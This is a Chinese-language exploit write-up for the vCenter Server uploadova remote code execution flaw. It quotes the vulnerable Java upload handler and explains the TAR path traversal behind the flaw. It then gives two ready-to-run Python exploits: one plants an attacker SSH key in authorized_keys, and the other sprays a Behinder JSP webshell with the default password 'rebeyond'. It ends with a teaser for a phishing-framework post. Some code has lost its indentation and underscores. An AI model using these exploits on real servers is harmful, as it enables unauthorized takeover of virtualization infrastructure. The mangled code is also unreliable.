VCenter Server RCE

• 漏洞分析
  在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求，从而在服务器上写入 webshell ，最终造成远程任意代码执行。
• 源码利用点：*uploadova* 接口存在一个上传 OVA 文件的功能：

```java
@RequestMapping(
value = {"/uploadova"},
method = {RequestMethod.POST}
)
public void uploadOvaFile(@RequestParam(value = "uploadFile",required = true) CommonsMultipartFile uploadFile, HttpServletResponse response) throws Exception {
logger.info("Entering uploadOvaFile api");
int code = uploadFile.isEmpty() ? 400 : 200;
PrintWriter wr = null;
...
response.setStatus(code);
String returnStatus = "SUCCESS";
if (!uploadFile.isEmpty()) {
try {
logger.info("Downloading OVA file has been started");
logger.info("Size of the file received : " + uploadFile.getSize());
InputStream inputStream = uploadFile.getInputStream();
File dir = new File("/tmp/unicorn_ova_dir");
if (!dir.exists()) {
dir.mkdirs();
} else {
String[] entries = dir.list();
String[] var9 = entries;
int var10 = entries.length;

            for(int var11 = 0; var11 < var10; ++var11) {
                String entry = var9[var11];
                File currentFile = new File(dir.getPath(), entry);
                currentFile.delete();
            }

            logger.info("Successfully cleaned : /tmp/unicorn_ova_dir");
        }

        TarArchiveInputStream in = new TarArchiveInputStream(inputStream);
        TarArchiveEntry entry = in.getNextTarEntry();
        ArrayList result = new ArrayList();

```

java
while(entry != null) {
if (entry.isDirectory()) {
entry = in.getNextTarEntry();
} else {
File curfile = new File("/tmp/unicorn_ova_dir", entry.getName());
File parent = curfile.getParentFile();
if (!parent.exists()) {
parent.mkdirs();

直接将 TAR 的文件名与 /tmp/unicorn_ova_dir 拼接并写入文件。如果文件名内存在 ../ 即可实现目录遍历。

• 漏洞利用
  可以创建一个包含 ../../home/vsphere-ui/.ssh/authorized_keys 的 TAR 文件并上传后利用 SSH 登陆
  可以在目标服务器上写入 JSP webshell 文件，由于服务是 System 权限，所以可以任意文件写。

EXP

• ssh连接

Linux下利用文件上传，达到远程ssh登录

本地创建用户vsphere-ui

切换用户至新创建的用户，生成认证密钥

PowerShell
ssh-keygen -t rsa

将生成的id_rsa_pub复制到下面的EXP代码中去

```python
import tarfile
import os
from io import BytesIO
import requests

def return_zip():
with tarfile.open("test.tar", 'w') as tar:
payload = BytesIO()
id_rsa_pub='ssh-rsa AAAAB3CzaC1yc2EAAAADAQABAAABgQDk5jGG1WR2WLmy/ggnlRChwHKgW1lPRzXKI3Qk9zyI9+tsGCu8KVk5ATV3/w1ATL7s73qtDtAxHO4esFjcfHNiqomSdhd/+tdaVDaK4O8GZXvakFnnyToSTYtzqvWFW/7bCoIIQaEDG40dW+vINRXOg1cEnMvxQsd7ndNx907brxBQVDnlvMxXibCmuQjhXBjFqr7MM0oDXRNrb0oWDqDmS2P2PdDiFw3rCtDO3TX8GLS0pShVvVEEdn6538PNwGxqV1JHXfPLMRBzSk4GuSls2VJ1Qf7k+7QPPd3006G+9lKBn3Yi9jLmu+q1vfBWl8KpO7fOUN+OQWt7SapTvxa9vPB4nPfy0bUks8e8SWczUZ6PFVkVTxGHuVOrC9wJr9IESEztSHN3il/QyQ/tEvJOeK/JXz28JZ+SWKDYXhm3sOoxSu7SJkL1mOwr95ZT+h58hBe3kFw8tnb6eErV4Ca0nW4XTzSO1778yoCyYfho7zyQLTx7I60waMvURMIbhQ0= vsphere-ui@cipher'
tarinfo = tarfile.TarInfo(name='../../../home/vsphere-ui/.ssh/authorized_keys')
#将自己生成的id_rsa_pub复制到此处
f1 = BytesIO(id_rsa_pub.encode())
tarinfo.size = len(f1.read())
f1.seek(0)
tar.addfile(tarinfo, fileobj=f1)
tar.close()
payload.seek(0)
def getshell(url):
files = {'uploadFile':open('test.tar','rb')}
try:
r = requests.post(url=url, files=files,verify = False).text
print(r)
except:
print('连接服务器失败')

if name == "main":
try:
return_zip()
url="https://xxx.xxx.xxx.xxx/ui/vropspluginui/rest/services/uploadova" #键入存在漏洞的url;https://xxx.xxx.xxx.xxx
getshell(url)
except IOError as e:
raise e
```

通过burpsuite抓包查看

成功运行此EXP后，即可利用ssh登录到存在漏洞的服务器

```PowerShell
ssh [email protected]

```

• webshell连接

```python
def uploadLinuxRandomPayload(URL):
for i in range(0, 120):
"""
脚本默认是将shell文件循环插入120次，当插入第一个shell文件时会请求爬虫去访问我shell文件是否
插入成功，如果回显验证成功，EXP会停止插入shell文件并自动退出。
"""
archive(
LINUX_RANDOM_PAYLOAD_SOURCE,
"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/{REPLACE_RANDOM_ID_HERE}/0/h5ngc.war/resources/shell.jsp".format(
REPLACE_RANDOM_ID_HERE=i
),
)
file = {"uploadFile": open(LINUX_RANDOM_PAYLOAD_TARFILE, "rb")}
re = requests.post(
URL + VUL_URI, files=file, verify=False, timeout=TIMEOUT, headers=headers
)
if "SUCCESS" in re.text and checkShellExist(URL + LINUX_SHELL_URL):
print(
"[+] Shell exist URL: {url}, default password:rebeyond".format(
url=URL + LINUX_SHELL_URL
)
)
print(
"[+] Found Server Path exists!!!! Try times {REPLACE_RANDOM_ID_HERE}".format(
REPLACE_RANDOM_ID_HERE=i
)
)
exit()

```

工具的payload文件夹内的tar文件为嵌套冰蝎3，所以此处直接用冰蝎来连接，成功getshell

• 受影响版本：
  vCenter Server 7.0 < 7.0U1c
  vCenter Server 6.7 < 6.7U3l
  vCenter Server 6.5 < 6.5U3n
  Cloud Foundation (vCenterServer) 4.X < 4.2
  Cloud Foundation (vCenterServer) 3.X < 3.10.1.2

相关推荐: Gophish的那点儿东西

Gophish钓鱼的SAO操作 0x01介绍 Gophish 是一个功能强大的开源网络钓鱼框架。 0x02 安装 Github 地址 https://github.com/gophish/gophish/releases/tag/v0.11.0 windows…